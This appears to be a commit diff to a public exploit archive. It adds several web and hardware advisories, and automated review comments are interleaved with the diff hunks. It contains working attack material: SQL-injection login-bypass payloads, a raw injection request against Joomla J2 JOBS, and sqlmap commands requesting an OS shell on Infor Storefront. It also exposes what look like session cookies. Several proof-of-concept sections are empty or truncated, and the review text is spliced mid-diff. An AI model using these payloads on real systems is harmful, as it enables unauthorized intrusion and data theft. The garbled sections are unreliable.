diff --git a/exploits/hardware/webapps/48668.txt b/exploits/hardware/webapps/48668.txt
new file mode 100644
index 000000000..390b583f4
--- /dev/null
+++ b/exploits/hardware/webapps/48668.txt
@@ -0,0 +1,28 @@
+# Exploit Title: SuperMicro IPMI WebInterface 03.40 - Cross-Site Request Forgery (Add Admin)
+# Exploit Author: Metin Yunus Kandemir
+# Date: 2020-07-15
+# Vendor Homepage: https://www.supermicro.com/
+# Version: X10DRH-iT motherboards with BIOS 2.0a and IPMI firmware 03.40
+# CVE: CVE-2020-15046
+# Source: https://www.totalpentest.com/post/supermicro-ipmi-webgui-cross-site-request-forgery
+
+# Description:
+# The web interface on Supermicro X10DRH-iT motherboards with BIOS 2.0a and IPMI firmware 03.40
+# allows remote attackers to exploit a cgi/config_user.cgi CSRF issue to add new admin users.
+# The fixed versions are BIOS 3.2 and firmware 03.88.
+
+# PoC :
+
+
+
+
+
+
+
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/exploits/hardware/webapps/48669.txt b/exploits/hardware/webapps/48669.txt
new file mode 100644
index 000000000..ebe0201c5
--- /dev/null
+++ b/exploits/hardware/webapps/48669.txt
@@ -0,0 +1,21 @@
+# Exploit Title: Zyxel Armor X1 WAP6806 - Directory Traversal
+# Date: 2020-06-19
+# Exploit Author: Rajivarnan R
+# Vendor Homepage: https://www.zyxel.com/
+# Software [http://www.zyxelguard.com/WAP6806.asp]
+# Version: [V1.00(ABAL.6)C0]
+# CVE: 2020-14461
+# Tested on: Linux Mint / Windows 10
+# Vulnerabilities Discovered Date : 2020/06/19 [YYYY/MM/DD]
+
+# As a result of the research, one vulnerability identified.
+# (Directory Traversal)
+# Technical information is provided below step by step.
+
+# [1] - Directory Traversal Vulnerability
+
+# Vulnerable Parameter Type: GET
+# Vulnerable Parameter: TARGET/Zyxel/images/eaZy/]
+
+# Proof of Concepts:https://TARGET/Zyxel/images/eaZy/
+
\ No newline at end of file
diff --git a/exploits/php/webapps/48626.txt b/exploits/php/webapps/48626.txt
index 694c4d00d..979721b78
--- a/exploits/php/webapps/48626.txt
+++ b/exploits/php/webapps/48626.txt
@@ -6,6 +6,7 @@ # Software Link:https://github.com/VictorAlagwu/CMSsite/archive/master.zip # Version: 1.0 # Tested on: Windows 10 +# CVE: CVE-2020-15599 Description: The form parameter 'user_firstname' and 'user_lastname' is vulnerable to stored cross site scripting
diff --git a/exploits/php/webapps/48670.txt b/exploits/php/webapps/48670.txt
new file mode 100644
index 000000000..246a5b996
--- /dev/null
+++ b/exploits/php/webapps/48670.txt
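Review bot: The `# PoC :` section of the added file is empty on the new side — the hunk declares 28 lines, but everything after `+# PoC :` is blank, so the advisory as committed carries no reproduction content at all, presumably because the HTML form body was stripped on submission. Since the record otherwise stands only on its description, the PoC should either be restored or the file should carry a line such as `# PoC: omitted (HTML form not preserved in this record)` so readers know the gap is deliberate. The header itself is complete for triage purposes: product, affected BIOS/firmware, CVE-2020-15046 and the fixed versions are all stated.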
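Review bot: `# CVE: 2020-14461` on the new side drops the `CVE-` prefix that the other advisories in this commit use (`# CVE: CVE-2020-15046`, `# CVE: CVE-2020-15599`), which breaks any tooling that matches on the full identifier; change it to `# CVE: CVE-2020-14461`. The `# Vulnerable Parameter:` line also carries a stray closing bracket (`TARGET/Zyxel/images/eaZy/]`), and `Proof of Concepts:https://...` is missing a space after the colon. Separately, the single request shown is a plain GET to the `/Zyxel/images/eaZy/` directory with no traversal sequence, so what the PoC demonstrates reads as directory-listing exposure rather than path traversal; if that is the actual finding, the title and the `# [1]` heading should say so, because the classification determines which controls a defender checks.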
@@ -0,0 +1,36 @@
+# Exploit Title: Joomla! J2 JOBS 1.3.0 - 'sortby' Authenticated SQL Injection
+# Date: 2020-06-17
+# Exploit Author: Mehmet Kelepçe / Gais Cyber Security
+# Vendor Homepage: https://joomsky.com/
+# Software Link: https://joomsky.com/products/js-jobs-pro.html
+# Change Log (Update) : https://joomsky.com/products/js-jobs.html
+# Version: 1.3.0
+# Tested on: Kali Linux - Apache2
+
+Vulnerable param: sortby
+-------------------------------------------------------------------------
+POST /joomla/administrator/index.php HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://localhost/joomla/administrator/index.php
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 233
+Connection: close
+Cookie: COOKIES
+Upgrade-Insecure-Requests: 1
+
+js_sortby=4&companyname=12&jobtitle=12&location=12&jobcategory=&jobtype=&datefrom=&dateto=&option=com_jsjobs&task=&c=job&view=job&callfrom=jobqueue&layout=jobqueue&sortby=asc&my_click=&boxchecked=0&d90ced5aa929447644f09b56c8d8ba12=1
+
+
+-------------------------------------------------------------------------
+sqlmap poc:
+
+sqlmap -r jsjobs --dbs --risk=3 --level=5 --random-agent -p sortby
+
+
+Mehmet KELEPÇE
+
+Penetration Tester | Red Team
\ No newline at end of file
diff --git a/exploits/php/webapps/48671.txt b/exploits/php/webapps/48671.txt
new file mode 100644
index 000000000..32d860fd8
--- /dev/null
+++ b/exploits/php/webapps/48671.txt
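Review bot: The header block has no fixed-version or vendor-response line, so a reader cannot tell from the new side whether an upgrade exists — `# Change Log (Update) :` links to the vendor product page but does not say which release, if any, addresses the `sortby` issue. Add a line such as `# Fixed in: <version, or 'unpatched at time of writing'>` next to `# Version: 1.3.0`. It would also help to state in prose that the request goes to `/joomla/administrator/index.php` and therefore needs an authenticated back-end session, which is what the `Authenticated` qualifier in the title relies on; the raw request conveys that only implicitly through `Cookie: COOKIES`.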
@@ -0,0 +1,46 @@
+# Exploit Title: Online Polling System 1.0 - Authentication Bypass
+# Date: 2020-07-20
+# Author: AppleBois
+# Version: NULL
+# Software Link: https://www.sourcecodester.com/php/14330/online-polling-system.html
+#
+# Administration Control Panel || Authentication Bypass
+# Unthenticated User perform SQL Injection bypass login mechanism on /admin/checklogin.php
+#
+######################################################################################
+#Vulnerable Code
+#
+#$myusername=$_POST['myusername'];
+#$mypassword=$_POST['mypassword'];
+#$encrypted_mypassword=md5($mypassword);
+#
+#$result=mysqli_query($conn, "SELECT * FROM `tbadministrators` WHERE email='$myusername' and password='$encrypted_mypassword'");
+#
+#$count=mysqli_num_rows($result);
+#
+#if($count==1){
+#
+#$user = mysqli_fetch_assoc($result);
+#$_SESSION['member_id'] = $user['member_id'];
+#header("location:student.php");
+#}
+#
+######################################################################################
+
+
+POST /admin/checklogin.php HTTP/1.1
+Host: 10.10.10.2:81
+Content-Length: 53
+Cache-Control: max-age=0
+Upgrade-Insecure-Requests: 1
+Origin: http://10.10.10.2:81
+Content-Type: application/x-www-form-urlencoded
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Referer: http://10.10.10.2:81/online/index.php
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Cookie: ASP.NET_SessionId=vbrb31kd3s5hmz3uobg0smck; UserSettings=language=1; dnn_IsMobile=False; .ASPXANONYMOUS=VA9hDh-1Ldg0FPbBfd9HAWSTqKjasYcZMlHQnpPaoR5WQipK7Q_kKnAlAqfWp0WgtO8HXH2_Tsrhfh-Z7137cng_MeEp3aiMPswVEPZc-UOdZQTp0; __RequestVerificationToken_L0ROTg2=Js5PUWl0BiY3kJLdEPU2oEna_UsEFTrNQiGY986uBwWdRyVDxr2ItTPSUBd07QX6rRyfXQ2; USERNAME_CHANGED=; language=en-US; authentication=DNN; .DOTNETNUKE=CC547735526446773F995D833FACDA646745AE4409516EBF345F1AC725F7D7CE7BFC420BF5EFE9FE2AEC92B04C89CCD2E64C34BA4E195D7D8D6EED7892574DB3FF02599F; ICMSSESSION=mgnp26oubn7hfc590q6j5c9o70; PHPSESSID=1gpgmmltf6uk3ju3aakgd0s8m5
+Connection: close
+
+myusername=' or 1=1#&mypassword=ad&Submit=Login
\ No newline at end of file
diff --git a/exploits/php/webapps/48672.txt b/exploits/php/webapps/48672.txt
new file mode 100644
index 000000000..723748ac9
--- /dev/null
+++ b/exploits/php/webapps/48672.txt
@@ -0,0 +1,36 @@
+# Exploit Title: Web Based Online Hotel Booking System 0.1.0 - Authentication Bypass
+# Date: 2020-07-03
+# Exploit Author: KeopssGroup0day,Inc
+# Vendor Homepage: https://github.com/mrzulkarnine/Web-based-hotel-booking-system
+# Software Link: https://github.com/mrzulkarnine/Web-based-hotel-
+booking-system
+# Version: 0.1.0
+# Tested on: Kali Linux
+
+Source code(localhost/admin/loginauth.php):
+ 0)
+ {
+ header('Refresh: 0;url=dashboard.php');
+ }
+ else
+ {
+
+ session_destroy();
+ header("location: index.htm");
+ }
+ ?>
+
+Payload:
+ Username: 1' or 1 = 1 LIMIT 1#
+ Password: 1' or 1 = 1 LIMIT 1#
\ No newline at end of file
diff --git a/exploits/php/webapps/48673.txt b/exploits/php/webapps/48673.txt
new file mode 100644
index 000000000..d23958d20
--- /dev/null
+++ b/exploits/php/webapps/48673.txt
@@ -0,0 +1,26 @@
+# Exploit Title: Online Farm Management System 0.1.0 - Persistent Cross-Site Scripting
+# Date: 2020-06-29
+# Exploit Author: KeopssGroup0day,Inc
+# Vendor Homepage: https://www.sourcecodester.com/php/14198/online-farm-management-system-phpmysql.html
+# Software Link: https://www.campcodes.com/projects/php/249/farm-management-system-in-php-mysql/
+# Version: 0.1.0
+# Tested on: Kali Linux
+
+Source code(review.php):
+fetch_array()) :
+?>
+
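Review bot: The `Cookie:` header in the captured request carries session material from unrelated stacks (`ASP.NET_SessionId`, `.ASPXANONYMOUS`, `__RequestVerificationToken_L0ROTg2`, `.DOTNETNUKE`, `ICMSSESSION`) alongside the only cookie this PHP target would read, `PHPSESSID`; these look copied from another environment, and publishing them in an advisory is a needless disclosure, so the header should be trimmed to `Cookie: PHPSESSID=<redacted>`. The quoted checklogin.php excerpt documents the root cause well — `$_POST` values interpolated straight into the `mysqli_query` string, and `md5()` as the password hash — but the advisory offers no remediation; a single line recommending a prepared statement (`mysqli_prepare`/`bind_param`) together with `password_hash`/`password_verify` would make the record actionable for the maintainer. Also `Unthenticated` in the summary line should read `Unauthenticated`, and `# Version: NULL` should either name the tested release or be dropped.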
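Review bot: `# Software Link:` is broken across two lines on the new side (`https://github.com/mrzulkarnine/Web-based-hotel-` followed by `booking-system`), so the link does not resolve as written and diverges from the intact `# Vendor Homepage:` URL directly above it; rejoin it onto one line. The `Source code(localhost/admin/loginauth.php):` excerpt is also truncated — only `0)`, the braces and the two redirect calls survive, and the query that the payload targets is missing — which I suspect is markup lost on submission, since the hunk header still counts 36 lines. Without the query line the excerpt no longer shows the root cause, so it should be re-added (or the header should note the omission), and a remediation sentence pointing at a parameterized query would round out the record.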
+
+
+ +
+
+
+POC:
+
+1. http://192.168.1.58/a/review.php?pid=31 go
+2. We send the payload ()
+3. Write a review payload and submit
+4. And refresh the page
\ No newline at end of file
diff --git a/exploits/php/webapps/48674.txt b/exploits/php/webapps/48674.txt
new file mode 100644
index 000000000..db30eb97c
--- /dev/null
+++ b/exploits/php/webapps/48674.txt
@@ -0,0 +1,37 @@
+# Exploit Title: Infor Storefront B2B 1.0 - 'usr_name' SQL Injection
+# Google Dork: inurl:storefrontb2bweb
+# Date: 2020-06-27
+# Exploit Author: ratboy
+# Vendor Homepage: https://www.insitesoft.com/infor-storefront/
+# Version: Infor Storefront
+# Tested on: Windows All Versions
+
+[POC Multiple Vulns]
+
+python sqlmap.py -u
+"http://localhost/storefrontB2BWEB/login.do?setup_principal=true&action=prepare_forgot&login=true&usr_name=ass"
+-p usr_name --dbms=mssql --level=5 --risk=3
+--tamper=between,space2comment -o --random-agent --parse-errors
+--os-shell --technique=ES
+
+
+python sqlmap.py -u
+"http://localhost/storefrontB2CWEB/cart.do?action=cart_add&itm_id=1"
+-p itm_id --dbms=mssql --level=5 --risk=3
+--tamper=between,space2comment -o --random-agent --parse-errors
+--os-shell --technique=ES
+
+
+or...
+
+http://localhost/storefrontB2BWEB/login.do?setup_principal=true&action=prepare_forgot&login=true&usr_name=ass'[SQL
+INJECTION];--
+
+http://localhost/storefrontB2CWEB/cart.do?action=cart_add&itm_id=1'[SQL
+INJECTION];--
+
+
+
+--
+Sincerly,
+Aaron Schrom
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index a33141678..3650ffcef
--- a/files_exploits.csv
+++ b/files_exploits.csv
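Review bot: The `Source code(review.php):` excerpt and the payload in step `2. We send the payload ()` are both empty on the new side — only `fetch_array()) :` and `?>` remain of the PHP block — so the advisory as committed identifies neither the field that is rendered without encoding nor what was submitted, and the steps cannot be followed; this looks like markup stripped on submission rather than authorial intent. Restore the excerpt, or at minimum name the affected field in prose (for example `# Vulnerable field: the review text rendered by review.php`, if that is what the loop outputs), and add the remediation the maintainer needs: encode output with `htmlspecialchars()` at the point of rendering. The `# Vendor Homepage:` (sourcecodester) and `# Software Link:` (campcodes) point at two different distribution sites; confirming both ship the same 0.1.0 package would remove ambiguity about which copy is affected.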
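Review bot: `# Version: Infor Storefront` on the new side is a product name rather than a version, and `# Tested on: Windows All Versions` is a claim no single test can support; the header should give the actual build tested (or `# Version: unknown`), since defenders use that field to decide whether they are affected. The title and the header mention only the B2B `usr_name` parameter, yet the body documents a second injection point, `itm_id` on `storefrontB2CWEB/cart.do`; add a description line naming both so the second endpoint is not lost in triage. Also `Sincerly,` should read `Sincerely,`.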
@@ -42915,3 +42915,10 @@ id,file,description,date,author,type,platform,port
 48663,exploits/php/webapps/48663.txt,"Park Ticketing Management System 1.0 - Authentication Bypass",2020-07-13,gh1mau,webapps,php,
 48666,exploits/multiple/webapps/48666.txt,"BSA Radar 1.6.7234.24750 - Local File Inclusion",2020-07-14,"William Summerhill",webapps,multiple,
 48667,exploits/multiple/webapps/48667.rb,"Trend Micro Web Security Virtual Appliance 6.5 SP2 Patch 4 Build 1901 - Remote Code Execution (Metasploit)",2020-07-14,"Mehmet Ince",webapps,multiple,
+48668,exploits/hardware/webapps/48668.txt,"SuperMicro IPMI WebInterface 03.40 - Cross-Site Request Forgery (Add Admin)",2020-07-15,"Metin Yunus Kandemir",webapps,hardware,
+48669,exploits/hardware/webapps/48669.txt,"Zyxel Armor X1 WAP6806 - Directory Traversal",2020-07-15,"Rajivarnan R",webapps,hardware,
+48670,exploits/php/webapps/48670.txt,"Joomla! J2 JOBS 1.3.0 - 'sortby' Authenticated SQL Injection",2020-07-15,"Mehmet Kelepçe",webapps,php,
+48671,exploits/php/webapps/48671.txt,"Online Polling System 1.0 - Authentication Bypass",2020-07-15,AppleBois,webapps,php,
+48672,exploits/php/webapps/48672.txt,"Web Based Online Hotel Booking System 0.1.0 - Authentication Bypass",2020-07-15,KeopssGroup0day_Inc,webapps,php,
+48673,exploits/php/webapps/48673.txt,"Online Farm Management System 0.1.0 - Persistent Cross-Site Scripting",2020-07-15,KeopssGroup0day_Inc,webapps,php,
+48674,exploits/php/webapps/48674.txt,"Infor Storefront B2B 1.0 - 'usr_name' SQL Injection",2020-07-15,ratboy,webapps,php,